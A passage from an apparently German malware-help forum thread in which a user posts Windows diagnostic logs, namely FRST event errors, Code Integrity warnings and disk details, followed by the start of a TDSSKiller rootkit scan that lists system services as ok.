Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: bce9150f-3248-4ead-8318-8150d1bf8130 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/20/2017 02:27:58 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0x203c Startzeit der fehlerhaften Anwendung: 0x01d2d16481b9cf5d Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: 4df17c98-057f-4230-b052-4a764dc63e50 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/20/2017 10:19:14 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Fehler beim Generieren des Aktivierungskontextes für "c:\program files\amd\cim\bin64\SetACL64.exe". Die abhängige Assemblierung "Microsoft.VC80.MFC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"" konnte nicht gefunden werden. Verwenden Sie für eine detaillierte Diagnose das Programm "sxstrace.exe". 
Error: (05/20/2017 10:16:45 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: DipAwayMode.exe, Version: 0.0.0.0, Zeitstempel: 0x00000000 Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 10.0.15063.296, Zeitstempel: 0x28e9cf15 Ausnahmecode: 0xc0000409 Fehleroffset: 0x000eb802 ID des fehlerhaften Prozesses: 0xe7c Startzeit der fehlerhaften Anwendung: 0x01d2d141696bf18e Pfad der fehlerhaften Anwendung: C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe Pfad des fehlerhaften Moduls: C:\WINDOWS\System32\KERNELBASE.dll Berichtskennung: 9853c85f-3fc8-4b95-b23c-2a10b9d919d4 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/19/2017 03:30:48 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511 Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0 Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000018da1b ID des fehlerhaften Prozesses: 0xe04 Startzeit der fehlerhaften Anwendung: 0x01d2d0a3e937c3db Pfad der fehlerhaften Anwendung: C:\Program Files\Bitdefender\Bitdefender 2017\odslv.exe Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll Berichtskennung: 55771ade-ec8b-4200-84b1-9a5029b17a41 Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Error: (05/19/2017 03:29:12 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Name der fehlerhaften Anwendung: odslv.exe, Version: 21.0.25.80, Zeitstempel: 0x58fa3511 Name des fehlerhaften Moduls: sciter.dll, Version: 4.0.0.7, Zeitstempel: 0x59146bc0 Ausnahmecode: 0xc0000005 Fehleroffset: 0x000000000018da1b ID des fehlerhaften Prozesses: 0x2788 Startzeit der fehlerhaften Anwendung: 0x01d2d0a3bfd8df47 Pfad der fehlerhaften Anwendung: C:\Program 
Files\Bitdefender\Bitdefender 2017\odslv.exe Pfad des fehlerhaften Moduls: C:\Program Files\Bitdefender\Bitdefender 2017\sciter.dll Berichtskennung: e7f89512-ad7c-48f5-9beb-8270e1eacebe Vollständiger Name des fehlerhaften Pakets: Anwendungs-ID, die relativ zum fehlerhaften Paket ist: Systemfehler: ============= Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/21/2017 08:56:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/21/2017 08:55:51 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "RtNdPt630" wurde aufgrund folgenden Fehlers nicht gestartet: Das System kann die angegebene Datei nicht finden. 
Error: (05/21/2017 08:55:49 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Der Dienst "CldFlt" wurde aufgrund folgenden Fehlers nicht gestartet: Die Anforderung wird nicht unterstützt. Error: (05/21/2017 08:55:17 PM) (Source: DCOM) (EventID: 10010) (User: ***) Description: Der Server "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden. Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/21/2017 12:24:26 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/20/2017 08:03:16 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. Error: (05/20/2017 02:27:55 PM) (Source: DCOM) (EventID: 10016) (User: NT-AUTORITÄT) Description: Durch die Berechtigungseinstellungen für "Anwendungsspezifisch" wird dem Benutzer "NT-AUTORITÄT\Lokaler Dienst" (SID: S-1-5-19) unter der Adresse "LocalHost (unter Verwendung von LRPC)" keine Berechtigung vom Typ "Lokal Aktivierung" für die COM-Serveranwendung mit der CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} und der APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} im Anwendungscontainer "Nicht verfügbar" (SID: Nicht verfügbar) gewährt. Die Sicherheitsberechtigung kann mit dem Verwaltungstool für Komponentendienste geändert werden. 
CodeIntegrity: =================================== Date: 2017-05-21 20:59:59.585 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 20:59:59.549 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 20:55:53.503 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2017-05-21 20:48:35.581 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 17:35:59.505 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\SysWOW64\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf32.dll that did not meet the Microsoft signing level requirements. 
Date: 2017-05-21 14:50:07.831 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 14:50:07.798 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-21 12:28:31.255 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-21 01:33:57.070 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. Date: 2017-05-20 20:19:32.035 Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\dllhost.exe) attempted to load \Device\HarddiskVolume2\Program Files\Bitdefender\Bitdefender 2017\active virus control\Avc3_00120_012\avcuf64.dll that did not meet the Microsoft signing level requirements. 
==================== Speicherinformationen =========================== Prozessor: Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz Prozentuale Nutzung des RAM: 30% Installierter physikalischer RAM: 8127.12 MB Verfügbarer physikalischer RAM: 5675.46 MB Summe virtueller Speicher: 14527.12 MB Verfügbarer virtueller Speicher: 11620.5 MB ==================== Laufwerke ================================ Drive c: () (Fixed) (Total:237.69 GB) (Free:147.43 GB) NTFS Drive d: () (Fixed) (Total:931.51 GB) (Free:620.58 GB) NTFS Drive e: (User Manual) (CDROM) (Total:0.19 GB) (Free:0 GB) CDFS ==================== MBR & Partitionstabelle ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 83B6EBCC) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=237.7 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=450 MB) - (Type=27) ======================================================== Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EA468D08) Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS) ==================== Ende von Addition.txt ============================ |
21.05.2017, 20:29 | #9 |
| Trojan, adware or something else? Code:
21:26:49.0660 0x2380 TDSS rootkit removing tool 3.1.0.15 Apr 18 2017 11:34:02
21:26:52.0765 0x2380 ============================================================
21:26:52.0765 0x2380 Current date / time: 2017/05/21 21:26:52.0765
21:26:52.0765 0x2380 SystemInfo:
21:26:52.0766 0x2380
21:26:52.0766 0x2380 OS Version: 10.0.15063 ServicePack: 0.0
21:26:52.0766 0x2380 Product type: Workstation
21:26:52.0766 0x2380 ComputerName: WELTZ
21:26:52.0767 0x2380 UserName: Dino
21:26:52.0767 0x2380 Windows directory: C:\WINDOWS
21:26:52.0767 0x2380 System windows directory: C:\WINDOWS
21:26:52.0767 0x2380 Running under WOW64
21:26:52.0767 0x2380 Processor architecture: Intel x64
21:26:52.0767 0x2380 Number of processors: 8
21:26:52.0767 0x2380 Page size: 0x1000
21:26:52.0767 0x2380 Boot type: Normal boot
21:26:52.0767 0x2380 CodeIntegrityOptions = 0x00000001
21:26:52.0767 0x2380 ============================================================
21:26:52.0850 0x2380 KLMD registered as C:\WINDOWS\system32\drivers\26266876.sys
21:26:52.0850 0x2380 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 15063.0, osProperties = 0x19
21:26:52.0984 0x2380 System UUID: {125CD7E0-CE60-5CA6-C788-ADA075B3A158}
21:26:53.0216 0x2380 Drive \Device\Harddisk0\DR0 - Size: 0x3B9E656000 ( 238.47 Gb ), SectorSize: 0x200, Cylinders: 0x799A, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:26:53.0217 0x2380 Drive \Device\Harddisk1\DR1 - Size: 0xE8E0DB6000 ( 931.51 Gb ), SectorSize: 0x200, Cylinders: 0x1DB01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
21:26:53.0219 0x2380 ============================================================
21:26:53.0220 0x2380 \Device\Harddisk0\DR0:
21:26:53.0220 0x2380 MBR partitions:
21:26:53.0220 0x2380 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0xAF000
21:26:53.0220 0x2380 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0xAF800, BlocksNum 0x1DB62000
21:26:53.0220 
0x2380 \Device\Harddisk1\DR1: 21:26:53.0410 0x2380 MBR partitions: 21:26:53.0410 0x2380 \Device\Harddisk1\DR1\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x74705800 21:26:53.0410 0x2380 ============================================================ 21:26:53.0413 0x2380 C: <-> \Device\Harddisk0\DR0\Partition2 21:26:53.0416 0x2380 D: <-> \Device\Harddisk1\DR1\Partition1 21:26:53.0416 0x2380 ============================================================ 21:26:53.0416 0x2380 Initialize success 21:26:53.0416 0x2380 ============================================================ 21:26:59.0184 0x0ce4 ============================================================ 21:26:59.0184 0x0ce4 Scan started 21:26:59.0184 0x0ce4 Mode: Manual; SigCheck; TDLFS; 21:26:59.0184 0x0ce4 ============================================================ 21:26:59.0184 0x0ce4 KSN ping started 21:26:59.0492 0x0ce4 KSN ping finished: true 21:27:00.0117 0x0ce4 ================ Scan system memory ======================== 21:27:00.0117 0x0ce4 System memory - ok 21:27:00.0117 0x0ce4 ================ Scan services ============================= 21:27:00.0141 0x0ce4 [ AAB860A5E606B9621E130D8C29D3F305, 93466620433B27F3BCFECDA26DD420AD1E5219034BA3B4E930EDED6D6728AE5C ] 1394ohci C:\WINDOWS\System32\drivers\1394ohci.sys 21:27:00.0169 0x0ce4 1394ohci - ok 21:27:00.0180 0x0ce4 [ 4140B14929C555E9513D59A2EEB5C471, 39A8400B3AA7FB1D8EBE87E65F89881AB23B6AE911BECAEC1FD86C7DADD4F1AA ] 3ware C:\WINDOWS\system32\drivers\3ware.sys 21:27:00.0188 0x0ce4 3ware - ok 21:27:00.0200 0x0ce4 [ D3DB4E3C096EFF74FB6E73E37CB66DD7, 451BE72D50D2316690910B86ACA1EBB5C0F3FE688BAB806EC94BCCB6F3798A0A ] ACPI C:\WINDOWS\system32\drivers\ACPI.sys 21:27:00.0218 0x0ce4 ACPI - ok 21:27:00.0221 0x0ce4 [ 3E5E5DAE5CAEC0209C93D3AD8128D8A0, 5CFA4D715AE8D928EA11F213C5A7B0B1C1705D2A8FF041E0A1988E645E669C54 ] AcpiDev C:\WINDOWS\System32\drivers\AcpiDev.sys 21:27:00.0229 0x0ce4 AcpiDev - ok 21:27:00.0233 0x0ce4 [ F72D7CC7E7A97A09757313F3B4C7E17A, 
36E3363380C51A2DB58D3177655A0A75DAA977C00C5A9C60A189068C0AFDC643 ] acpiex C:\WINDOWS\system32\Drivers\acpiex.sys 21:27:00.0241 0x0ce4 acpiex - ok 21:27:00.0244 0x0ce4 [ F04B6F53FBDB2B6B0451AE53DE19F0C9, 41A8C314A46867BAA45CD9666AAF734AD45B74E2033A8E66D93E17CDDAD66578 ] acpipagr C:\WINDOWS\System32\drivers\acpipagr.sys 21:27:00.0251 0x0ce4 acpipagr - ok 21:27:00.0253 0x0ce4 [ C347A6095F3BE417D24F1E1349F4AF0F, 72C9D759BB132985AF55860658DC01F08590A2BD7E976FCF25E1314C5AA1D37B ] AcpiPmi C:\WINDOWS\System32\drivers\acpipmi.sys 21:27:00.0260 0x0ce4 AcpiPmi - ok 21:27:00.0263 0x0ce4 [ 686BFFC47454DD2F58795C2EE891CA9F, 6CC4B6679914742D700A8373DED2DD9A821CA5284D4D73493BA0855DB8E6520A ] acpitime C:\WINDOWS\System32\drivers\acpitime.sys 21:27:00.0270 0x0ce4 acpitime - ok 21:27:00.0284 0x0ce4 [ E6A1D864EC90F4397DF5AB2633B34DD4, 05F1B7291EBDD9CA1D74649C0DAFCBE5F2CF93E92C5CA16A8AC10B6DF83101A0 ] AdobeFlashPlayerUpdateSvc C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe 21:27:00.0293 0x0ce4 AdobeFlashPlayerUpdateSvc - ok 21:27:00.0312 0x0ce4 [ FBDA59118E59B3722248C66BAD89CAA9, 11AB83499757E3143834348DE39E85D56EC853071C96337C3ADD8A1E374C6CBC ] ADP80XX C:\WINDOWS\system32\drivers\ADP80XX.SYS 21:27:00.0335 0x0ce4 ADP80XX - ok 21:27:00.0348 0x0ce4 [ AC1928C2F7505BD556C552F153B062AB, B48EA30F76DEA57868CA74CC775DD60257021A3DE10CE101B8BEFA1CE9D22CF4 ] AFD C:\WINDOWS\system32\drivers\afd.sys 21:27:00.0363 0x0ce4 AFD - ok 21:27:00.0369 0x0ce4 [ 1D914C996F2C3134E2344BB74F79BCF6, D27AF01BA29784555AF7D2E89A3A65E81D6AFE1D3C7E8F9367F06D9DF5F88069 ] ahcache C:\WINDOWS\system32\DRIVERS\ahcache.sys 21:27:00.0381 0x0ce4 ahcache - ok 21:27:00.0384 0x0ce4 [ 41856B40EE15F96DEC8755AB01FA3CF7, 33C3C899AF9CA15BE5A4CF097FF43DF3F0DBA0E48B6F1E28AE3E76AD76A1C361 ] AJRouter C:\WINDOWS\System32\AJRouter.dll 21:27:00.0392 0x0ce4 AJRouter - ok 21:27:00.0396 0x0ce4 [ F485CA5559DB37A4882467A4F7D58BEA, A1C648EFE12A5A3356BC0949372ADD0FF0CA2F5A8F992EB71C87E9C0D5C92BB2 ] ALG C:\WINDOWS\System32\alg.exe 
21:27:00.0404 0x0ce4 ALG - ok 21:27:00.0414 0x0ce4 [ D3E9EEDC0128DD1FB9E45D85E7E21F0B, 73853DC77CCE335F1571DB31C6F7E97D71625DC6226089E8281F62020F58CB8F ] AMD External Events Utility C:\WINDOWS\system32\atiesrxx.exe 21:27:00.0432 0x0ce4 AMD External Events Utility - ok 21:27:00.0440 0x0ce4 [ 08E3B9567A6FDD17A69956BA80F1E2D6, 179C4A09E51A41289C1AA11E778EB09E877A7F45FB5D54216F58D3EAF1FA88C4 ] amdacpksd C:\WINDOWS\system32\drivers\amdacpksd.sys 21:27:00.0450 0x0ce4 amdacpksd - ok 21:27:00.0455 0x0ce4 [ 9C39FBA94FFEF04561D13ED0D1B50DD0, 53FA118DEF37F0BA6030B9CB4C17019E6B5934941514756D66143B7BB66D7CA1 ] AmdK8 C:\WINDOWS\System32\drivers\amdk8.sys 21:27:00.0465 0x0ce4 AmdK8 - ok 21:27:00.0469 0x0ce4 [ 275B6F698CBEC36C42D3ABD7EE049BA1, C6CE3514947F67410B34E8973C87996A14FF485A2E5C7E5BA4FE276FB893D51C ] amdkmafd C:\WINDOWS\system32\drivers\amdkmafd.sys 21:27:00.0476 0x0ce4 amdkmafd - ok 21:27:00.0486 0x0ce4 amdkmdag - ok 21:27:00.0495 0x0ce4 [ 0E2B0B8C871A4BDA103B857E07CAC833, 80A3DB55FEBD3C6FEC0C6078D998F2B3A802425569F57ABCB2AF0D5C37D4A280 ] amdkmdap C:\WINDOWS\System32\DriverStore\FileRepository\c0313676.inf_amd64_96bbc33bec5c7fae\atikmpag.sys 21:27:00.0509 0x0ce4 amdkmdap - ok 21:27:00.0514 0x0ce4 [ 395D56FA2E22A10AE4774440D086F559, 24D7CBE9B82DC8900D9A5E345347FEC330D47FDBD1517A2AC10218BA2A9DFAA9 ] AmdPPM C:\WINDOWS\System32\drivers\amdppm.sys 21:27:00.0524 0x0ce4 AmdPPM - ok 21:27:00.0528 0x0ce4 [ EB729A9ADCB9F9C406B533F95E2F67D4, EDCB8E39C503FF30ECB82F368242179E2788C12B4FD9B557F38380A934E7D8E7 ] amdsata C:\WINDOWS\system32\drivers\amdsata.sys 21:27:00.0534 0x0ce4 amdsata - ok 21:27:00.0541 0x0ce4 [ 3B5C5C696F33FE61F1922533B03B9316, C9BAAA9B02547C66A276A31958DFD2A289C5963A4EE3FF306535565240D816CC ] amdsbs C:\WINDOWS\system32\drivers\amdsbs.sys 21:27:00.0550 0x0ce4 amdsbs - ok 21:27:00.0553 0x0ce4 [ A7D45A303FF8A9493C96C4B804051E6E, 6074C264876A398039D3F89905A486ABA5BDACA038B79920A34323B38CFCB358 ] amdxata C:\WINDOWS\system32\drivers\amdxata.sys 21:27:00.0559 0x0ce4 
amdxata - ok 21:27:00.0564 0x0ce4 [ 5180537517C27375B1F2CB37ED599FAF, 121BF0E3BDE068CC1E1E9B24DC334BA29348725E9BFB790699E4CC66664A4C3D ] AppID C:\WINDOWS\system32\drivers\appid.sys 21:27:00.0573 0x0ce4 AppID - ok 21:27:00.0577 0x0ce4 [ F7FEBF66A705F18DC063DFD259F15102, 394DA8A7355573C4D81C375450DF5C5B2FA6360E246B06FDE8E7F9ADF21360FA ] AppIDSvc C:\WINDOWS\System32\appidsvc.dll 21:27:00.0587 0x0ce4 AppIDSvc - ok 21:27:00.0591 0x0ce4 [ 13D7FEA71091D1EAD8ADDD10BFFEA06D, A707CAC76CBF0334E2FCE3220147B382F5E44DEF9E23DD459CF7C40F27771695 ] Appinfo C:\WINDOWS\System32\appinfo.dll 21:27:00.0602 0x0ce4 Appinfo - ok 21:27:00.0605 0x0ce4 [ EAF36A714E16A69B8B4ED7591CBA77B6, 11FE2A5D991FB8AF78F4E78FB6DF02005EC5404DC298FE2D4E7774BB0011AB52 ] applockerfltr C:\WINDOWS\system32\drivers\applockerfltr.sys 21:27:00.0618 0x0ce4 applockerfltr - ok 21:27:00.0623 0x0ce4 [ 290469FC9FDE400248DA3E528E729BC2, D9ABBEB76673D136698AA2F53C8EB1EAFBBDE365ACCA9AE348523B346143CA9C ] AppMgmt C:\WINDOWS\System32\appmgmts.dll 21:27:00.0634 0x0ce4 AppMgmt - ok 21:27:00.0645 0x0ce4 [ 82432C4D8E83A94C7644A61697113B4A, 97105B0089A1E02484B202AC58610A5DCFFF6F64402B67F9E8B6FF3A0FDB6E26 ] AppReadiness C:\WINDOWS\system32\AppReadiness.dll 21:27:00.0664 0x0ce4 AppReadiness - ok 21:27:00.0678 0x0ce4 [ B4F1CF9D0BE52DB8883655C469AAF521, D907B0838E70EBF5D55F00A87222CABE8904FEB8483F4F8168157F27A4EDB6EE ] AppVClient C:\WINDOWS\system32\AppVClient.exe 21:27:00.0697 0x0ce4 AppVClient - ok 21:27:00.0702 0x0ce4 [ 2D2DF2463FACFBF2FEE39DCCDF49D1B5, F083C1B5B2284AB818431ECC6C9A61EBAFA241840727B97DD0E3B4FF0CBD07C5 ] AppvStrm C:\WINDOWS\system32\drivers\AppvStrm.sys 21:27:00.0709 0x0ce4 AppvStrm - ok 21:27:00.0714 0x0ce4 [ B86E646CE67FE9D75C0D762B19B465FC, B50C45A06AC6862DB4B183F567D55AE289EB05E6A1B32CC3AEBB6163C4296D79 ] AppvVemgr C:\WINDOWS\system32\drivers\AppvVemgr.sys 21:27:00.0722 0x0ce4 AppvVemgr - ok 21:27:00.0727 0x0ce4 [ 2207D2A001A3C30B825F191CD2A76C91, A43EA8CB9E2D1A1FB2DDC738827514588BFFA420A2D618DBCA55614BE2E3B45D ] 
C:\WINDOWS\system32\drivers\lsi_sas3i.sys 21:27:06.0050 0x0ce4 LSI_SAS3i - ok 21:27:06.0053 0x0ce4 [ 80E82C46B27A923A3744531069B63857, C73A200FC2A009D19F2C26FAC07489EA0F4329CD7A1D80EB3200B19DFC883F8D ] LSI_SSS C:\WINDOWS\system32\drivers\lsi_sss.sys 21:27:06.0060 0x0ce4 LSI_SSS - ok 21:27:06.0072 0x0ce4 [ A69A59CD52D26443FF728FD52283598C, E416481B23CDADBB9E608E49C9DC9A520D14935E92CA9B63E7763692DB382D7D ] LSM C:\WINDOWS\System32\lsm.dll 21:27:06.0093 0x0ce4 LSM - ok 21:27:06.0097 0x0ce4 [ 88F5570C04766EE561FF129B2F93030C, A36F7FF563F813EC0F69E5BFB76C58A1C9824F54BA1729C4096E8B7B7C8D90EC ] luafv C:\WINDOWS\system32\drivers\luafv.sys 21:27:06.0108 0x0ce4 luafv - ok 21:27:06.0112 0x0ce4 [ D365217A6D4528ABB41B40C8FBD227E8, 340129785A5788A8FFE0E1B339A616D290F7504F3658F63E1A3B169B38460FBF ] MapsBroker C:\WINDOWS\System32\moshost.dll 21:27:06.0122 0x0ce4 MapsBroker - ok 21:27:06.0130 0x0ce4 [ C3EED732789052C98A2613A7E1C37CDA, D71735C8FB772EEB7F3F304CD79D8D774A9A285A94365DE0E635F61357EC9F0F ] mausbhost C:\WINDOWS\System32\drivers\mausbhost.sys 21:27:06.0141 0x0ce4 mausbhost - ok 21:27:06.0144 0x0ce4 [ 4DCE65116A28488593FF5A6A18B03DB0, AAFA7E7C1C9A38B8CF5CE530F96028191F52B1FDD2790246E413B63CF7C5F02A ] mausbip C:\WINDOWS\System32\drivers\mausbip.sys 21:27:06.0150 0x0ce4 mausbip - ok 21:27:06.0153 0x0ce4 [ 0609BF877A2F4DEECC62EEE220AB6242, 393268836EB055669997BD05866487497AFC396C9516DA4C4F143679B1DDCA6E ] megasas C:\WINDOWS\system32\drivers\megasas.sys 21:27:06.0160 0x0ce4 megasas - ok 21:27:06.0163 0x0ce4 [ EEC64C8D498D121607C7615FDFBEE4D0, B605B9886C1A05C999B005AEA6D0677DF632E2F34F4FF03F09C2E6C05F554D50 ] megasas2i C:\WINDOWS\system32\drivers\MegaSas2i.sys 21:27:06.0169 0x0ce4 megasas2i - ok 21:27:06.0179 0x0ce4 [ 2B7D3B206833D769218A1F4BE2D73B97, 25901A5E931DC3659993448E59ABC3601B7B0ED9AFEF0F5ECC139D0D0442F73B ] megasr C:\WINDOWS\system32\drivers\megasr.sys 21:27:06.0193 0x0ce4 megasr - ok 21:27:06.0198 0x0ce4 [ E0EF6C1399A9B1AAA0B28590411BED04, 
